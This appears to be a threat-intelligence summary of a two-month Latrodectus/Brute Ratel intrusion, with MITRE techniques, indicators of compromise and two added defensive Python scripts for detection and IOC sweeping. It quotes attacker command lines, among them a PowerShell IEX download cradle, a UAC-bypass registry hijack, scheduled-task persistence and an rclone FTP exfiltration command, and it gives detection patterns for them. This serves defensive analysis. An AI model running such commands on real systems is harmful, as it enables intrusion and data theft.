A Lunar Spider-linked Latrodectus JavaScript dropper (masquerading as a tax form) installed an MSI that deployed Brute Ratel, which in turn injected Latrodectus and enabled BackConnect VNC, leading to extensive discovery, credential theft (including from an unattend.xml and LSASS), lateral movement with Cobalt Strike, and data exfiltration via Rclone/FTP. The intrusion persisted nearly two months, leveraged tools like Zerologon exploits, Metasploit, and a custom .NET backdoor (lsassa.exe), and used domains/IPs such as workspacin.cloud, cloudmeri.com, and 45.129.199.214. #Latrodectus #BruteRatel #CobaltStrike #Rclone #cloudmeri.com
Keypoints
- Initial access via a heavily obfuscated Latrodectus JavaScript (tax-themed) that downloaded an MSI from 91.194.11[.]64 and executed Brute Ratel via rundll32.
- Brute Ratel loader injected Latrodectus into explorer.exe, which used BackConnect VNC to enable interactive access and file uploads/downloads.
- Threat actor harvested credentials from unattend.xml (plaintext domain admin), browsers, LSASS, and backup software (Veeam-Get-Creds), enabling domain-wide privilege escalation and RDP access.
- Extensive use of Cobalt Strike beacons (e.g., 45.129.199[.]214), process injection, PsExec, WMIC, Zerologon exploit (zero.exe), and other lateral movement techniques to compromise domain controllers, file servers, and backup servers.
- Custom .NET backdoor (lsassa.exe) provided persistence via scheduled task and periodic C2 polling (cloudmeri.com), while Brute Ratel and additional badger DLLs were used for long-term access.
- Data exfiltration occurred on day 20 using a renamed rclone binary and FTP (host 45.135.232.3, username J0eBidenAbrabdy1aS3ha2Yeami) over ~9 hours 46 minutes; no ransomware observed.
- IOC-rich environment with multiple C2 domains/IPs, YARA/Sigma detections, and evidence of cleanup (file deletion) and long dwell time (~2 months) before eviction.
MITRE Techniques
- [T1189] Drive-by Compromise – Malicious JavaScript masquerading as a tax form downloaded an MSI from “hxxp://91.194.11[.]64/MSI.msi” which installed the next stage (“…performed an HTTP request to the URL hxxp://91.194.11[.]64/MSI.msi to install the next stage…”).
- [T1059.007] JavaScript – The initial loader was a heavily obfuscated Latrodectus JavaScript file that executed only deobfuscated lines to trigger MSI download (“…deobfuscation workflow was identified, executing all the lines of code starting with ////”).
- [T1218.011] Rundll32 – MSI executed embedded DLL via rundll32 to invoke malicious exported functions (e.g., “rundll32 upfilles.dll,stow”, “rundll32 wscadminui.dll, wsca”).
- [T1055] Process Injection – Brute Ratel and Cobalt Strike injected payloads into legitimate processes (e.g., “injected Latrodectus malware into the explorer.exe process” and “injected Cobalt Strike beacons into spoolsv.exe”).
- [T1078.002] Domain Accounts – Threat actor used plaintext domain admin credentials obtained from unattend.xml to authenticate as Domain Admin (“…discovered and accessed an unattend.xml Windows Answer file containing plaintext domain administrator credentials…”).
- [T1547.001] Registry Run Keys / Startup Folder – Persistence via a Registry Run key named Update to execute Brute Ratel badger on startup (“…created a Run key, with an innocuous name of Update, which would execute the Brute Ratel badger…”).
- [T1053.005] Scheduled Task – Custom .NET backdoor created a scheduled task for persistence (“schtasks /create /tn "SchedulerLsass" /tr "%ALLUSERSPROFILE%\USOShared\lsassa.exe" /sc onstart”).
- [T1003.001] LSASS Memory – Credentials harvested from LSASS via injected processes and Cobalt Strike-assisted access (“All instances of LSASS access followed the same pattern… facilitated via a Cobalt Strike beacon process”).
- [T1555.003] Credentials from Web Browsers – Latrodectus stealer module targeted Chromium-based browsers and Firefox to extract stored credentials and cookies (“…capable of harvesting credentials from 29+ Chromium-based browsers… Firefox … targeting cookies.sqlite”).
- [T1552.001] Credentials in Files – Threat actor retrieved plaintext domain admin credentials from unattend.xml answer file (“…collected the file via Backconnect (using the GET C:\Unattend.xml command) and was able to access the plain-text domain admin credentials…”).
- [T1548.002] Bypass User Account Control – Cobalt Strike stager performed UAC bypass via ms-settings protocol hijack and elevated token duplication (“reg add "HKCU\Software\Classes\ms-settings\shell\open\command" … IEX …; privilege escalation through execution of ComputerDefaults.exe…”).
- [T1086/T1059.001] PowerShell / Command and Scripting Interpreter – Multiple PowerShell download-execute cradles used (e.g., Veeam-Get-Creds invocation and ms-settings PowerShell payloads: “IEX (New-Object Net.Webclient).DownloadString(‘hxxp://127.0.0[.]1:24003/’); Veeam-Get-Creds.ps1”).
- [T1570] Lateral Tool Transfer – Tools and payloads moved across hosts (Brute Ratel, Cobalt Strike beacons, zero.exe, rustscan, rclone) via PsExec, RDP, and file uploads (“…used PsExec to remotely deploy Cobalt Strike DLL beacons… deployed zero.exe and rustscan to other hosts…”).
- [T1021.001] Remote Desktop Protocol – Threat actor used RDP with harvested Domain Admin credentials to access additional servers (“…returned using RDP to access a new server… RDP logon to a file share server where they also deployed Cobalt Strike”).
- [T1210] Exploitation of Remote Services (Zerologon) – Custom zero.exe exploited CVE-2020-1472 to attempt lateral movement to a second domain controller (“…used the Zerologon (CVE-2020-1472) vulnerability to attempt additional lateral movement…”).
- [T1048.003] Exfiltration Over Unencrypted Non-C2 Protocol – Data exfiltrated using rclone over FTP to remote host 45.135.232[.]3 (“…deployed … renamed rclone binary to exfiltrate the data… used FTP to send data… to the threat actor’s remote host”).
- [T1105] Ingress Tool Transfer – Multiple tools downloaded/executed on hosts (MSI, Brute Ratel DLLs, Cobalt Strike stagers, rclone, rustscan) via BackConnect and other channels (“…uploaded additional malware to the beachhead host… downloaded the stealer module fxrm_vn_9.557302425.bin”).
- [T1070.004] File Deletion – Threat actor deleted many downloaded files and tools to hinder analysis (“…deleted more than half of the files and tools that had been downloaded on the compromised hosts.”).
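The technique list above quotes the exact command lines the actor used (rundll32 with a custom export, the SchedulerLsass task, the ms-settings handler hijack, the IEX download cradle, the renamed rclone). The following is an added example, not tooling from the report or from The DFIR Report, that turns those quoted patterns into simple behavioural rules and runs them over constructed Sysmon-style process-creation events. The event records, host names and the `original_file_name` field usage are assumptions made for the demo; the command-line patterns are the ones quoted on the page.

```python
"""Behavioural detections for the command lines quoted in the technique list.

Added example: rules are derived from the patterns the report quotes; the events
below are constructed Sysmon-style process-creation records, not intrusion data.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    image: str                    # full path of the created process
    command_line: str
    original_file_name: str = ""  # PE OriginalFileName as Sysmon Event ID 1 records it


# rundll32 loading a DLL by bare name or from outside the system directories and
# calling a short custom export (page: "rundll32 upfilles.dll,stow").
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
KNOWN_GOOD_DLLS = {"shell32.dll", "user32.dll"}  # tiny allowlist; extend from your own baseline


def rundll32_custom_export(e: ProcEvent) -> bool:
    m = re.search(r'rundll32(?:\.exe)?\s+"?([^\s",]+\.dll)"?\s*,\s*(\w+)', e.command_line, re.I)
    if not m:
        return False
    dll = m.group(1).lower()
    if dll.startswith(SYSTEM_DIRS) or dll.rsplit("\\", 1)[-1] in KNOWN_GOOD_DLLS:
        return False
    return True


# schtasks persistence from ProgramData at boot (page: task "SchedulerLsass" running
# %ALLUSERSPROFILE%\USOShared\lsassa.exe with /sc onstart).
def schtasks_programdata_onstart(e: ProcEvent) -> bool:
    cl = e.command_line.lower()
    return ("schtasks" in cl and "/create" in cl and "/sc onstart" in cl
            and ("%allusersprofile%" in cl or "\\programdata\\" in cl))


# ms-settings protocol handler hijack behind the ComputerDefaults/fodhelper UAC bypass
# (page: reg add HKCU\Software\Classes\ms-settings\shell\open\command).
def ms_settings_hijack(e: ProcEvent) -> bool:
    return re.search(r"hkcu\\software\\classes\\ms-settings\\shell\\open\\command",
                     e.command_line, re.I) is not None


# PowerShell download-and-execute cradle (page: IEX (New-Object Net.Webclient).DownloadString(...)).
def powershell_download_cradle(e: ProcEvent) -> bool:
    cl = e.command_line
    return (re.search(r"\biex\b|invoke-expression", cl, re.I) is not None
            and re.search(r"downloadstring|downloadfile", cl, re.I) is not None)


# A renamed rclone keeps its PE OriginalFileName (page: rclone renamed to sihosts.exe).
def renamed_rclone(e: ProcEvent) -> bool:
    return (e.original_file_name.lower() == "rclone.exe"
            and not e.image.lower().endswith("\\rclone.exe"))


RULES = [
    ("rundll32 custom export", "T1218.011", rundll32_custom_export),
    ("schtasks onstart from ProgramData", "T1053.005", schtasks_programdata_onstart),
    ("ms-settings handler hijack", "T1548.002", ms_settings_hijack),
    ("PowerShell download cradle", "T1059.001", powershell_download_cradle),
    ("renamed rclone", "T1048.003", renamed_rclone),
]


def detect(events):
    """Return (host, technique, rule name) for every rule that fires on every event."""
    return [(e.host, tech, name) for e in events for name, tech, rule in RULES if rule(e)]


# Constructed sample events modelled on the quoted command lines (hosts are made up).
SAMPLE_EVENTS = [
    ProcEvent("WS01", r"C:\Windows\System32\rundll32.exe", r"rundll32 upfilles.dll,stow"),
    ProcEvent("WS01", r"C:\Windows\System32\rundll32.exe",
              r"rundll32 shell32.dll,Control_RunDLL hotplug.dll"),  # benign
    ProcEvent("WS01", r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn "SchedulerLsass" /tr "%ALLUSERSPROFILE%\USOShared\lsassa.exe" /sc onstart'),
    ProcEvent("WS01", r"C:\Windows\System32\reg.exe",
              r'reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d '
              "\"powershell -c IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:24003/')\" /f"),
    ProcEvent("WS01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -nop -w hidden -c \"IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:24003/'); Veeam-Get-Creds.ps1\""),
    ProcEvent("FS01", r"C:\ProgramData\sihosts.exe",
              r"sihosts.exe copy D:\Shares ftp:data --config rclone.conf", original_file_name="rclone.exe"),
    ProcEvent("DC01", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p"),  # benign
]

if __name__ == "__main__":
    for host, technique, rule in detect(SAMPLE_EVENTS):
        print(f"{host}: {technique} {rule}")
```

The rclone rule is the one worth noting: because the actor renamed the binary to sihosts.exe, an image-name match alone misses it, while the PE OriginalFileName that Sysmon records survives the rename. The reg add event fires two rules at once (the handler hijack and the cradle embedded in its /d value), which mirrors how the page describes that step.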
Indicators of Compromise
- [Domains] C2 and infrastructure – workspacin.cloud, cloudmeri.com, avtechupdate.com (examples of Latrodectus, lsassa backdoor, and Cobalt Strike C2s)
- [IP Addresses] C2 and hosting – 45.129.199.214 (Cobalt Strike), 91.194.11.64 (MSI stage), 45.135.232.3 (Rclone FTP host)
- [File Names] Payloads and tools observed – Form_W-9_Ver-i40_53b043910-86g91352u7972-6495q3.js (Latrodectus dropper), upfilles.dll / wscadminui.dll (Brute Ratel badgers), lsassa.exe (custom .NET backdoor), sys.dll / cron801.dl_ / system.dl_ (Cobalt Strike stagers)
- [Hashes] Sample file hashes for key binaries – sys.dll: ad3c52316e00…, upfilles.dll: ccb6d3cb020f… (additional hashes, including those for lsassa.exe and rclone-related files, are listed in the full report)
- [Tools/Utilities] Exfiltration & scanning utilities – renamed rclone (sihosts.exe) with rclone.conf (host=45.135.232.3, user=J0eBidenAbrabdy1aS3ha2Yeami), rustscan.exe (example hash 9eaa8464…)
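The indicators above appear in two notations on this page: defanged (hxxp, [.]) in the technique list and plain in the IOC list. The following is an added example, not tooling from the report or from The DFIR Report, that normalises both forms and sweeps constructed DNS, proxy and process log lines for the listed domains, IPs and file names. It goes slightly beyond the page in that a subdomain of a listed domain also counts as a hit. The log format and host names are assumptions made for the demo; the indicator values are the page's own (truncated hashes are not usable for matching and are left out).

```python
"""Refang the page's indicators and sweep constructed log lines for them.

Added example, not tooling from the report. Indicator values come from the page;
every log line below is constructed for the demo. Subdomain matching is an
extension beyond the page's literal list.
"""
import re

RAW_IOCS = {
    "domain": ["workspacin.cloud", "cloudmeri.com", "avtechupdate.com"],
    "ip": ["45.129.199[.]214", "91.194.11[.]64", "45.135.232[.]3"],  # defanged form, as in the technique list
    "filename": ["lsassa.exe", "upfilles.dll", "wscadminui.dll", "sihosts.exe",
                 "zero.exe", "rustscan.exe", "sys.dll",
                 "Form_W-9_Ver-i40_53b043910-86g91352u7972-6495q3.js"],
}


def refang(value: str) -> str:
    """Normalise defanged notation (hxxp, [.], (.), {.}, [:]) to a matchable lowercase form."""
    v = value.strip().lower()
    v = re.sub(r"^hxxp(s?)://", r"http\1://", v)
    for old, new in (("[.]", "."), ("(.)", "."), ("{.}", "."), ("[:]", ":")):
        v = v.replace(old, new)
    return v


def defang(value: str) -> str:
    """Inverse of refang for safe sharing: hxxp scheme and bracketed dots."""
    v = re.sub(r"^http(s?)://", r"hxxp\1://", value)
    return v.replace(".", "[.]")


IOCS = {kind: {refang(v) for v in values} for kind, values in RAW_IOCS.items()}

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOSTNAME = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b", re.I)
FILENAME = re.compile(r"[\w.-]+\.(?:exe|dll|js|dl_)\b", re.I)


def domain_hit(name: str):
    """Return the listed domain that `name` equals or is a subdomain of, else None."""
    name = name.lower()
    for d in IOCS["domain"]:
        if name == d or name.endswith("." + d):
            return d
    return None


def sweep(lines):
    """Return (line number, ioc kind, matched indicator) for every indicator seen."""
    hits = []
    for n, line in enumerate(lines, 1):
        for ip in IPV4.findall(line):
            if ip in IOCS["ip"]:
                hits.append((n, "ip", ip))
        for host in HOSTNAME.findall(line):
            if IPV4.fullmatch(host):
                continue  # dotted quads were already handled as IPs
            d = domain_hit(host)
            if d:
                hits.append((n, "domain", d))
        for fn in FILENAME.findall(line):
            if fn.lower() in IOCS["filename"]:
                hits.append((n, "filename", fn.lower()))
    return hits


# Constructed log lines (timestamps, hosts and the benign entries are made up).
SAMPLE_LOGS = [
    "2025-01-01T10:00:00Z dns host=WS01 query=cloudmeri.com",
    "2025-01-01T10:00:05Z dns host=WS02 query=api.workspacin.cloud",
    "2025-01-01T10:01:00Z proxy host=FS01 dst=45.129.199.214:443 method=CONNECT",
    r"2025-01-01T10:02:00Z proc host=FS01 image=C:\ProgramData\USOShared\lsassa.exe",
    "2025-01-01T10:03:00Z dns host=DC01 query=update.microsoft.com",
    "2025-01-01T10:04:00Z proxy host=DC01 dst=10.0.0.5:445",
]

if __name__ == "__main__":
    for n, kind, ioc in sweep(SAMPLE_LOGS):
        print(f"line {n}: {kind} {defang(ioc)}")
```

Printing matches through `defang` keeps the output safe to paste into a ticket; `refang` is applied once when the indicator sets are built, so the sweep itself compares plain values only.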
Read more: https://thedfirreport.com/2025/09/29/from-a-single-click-how-lunar-spider-enabled-a-near-two-month-intrusion/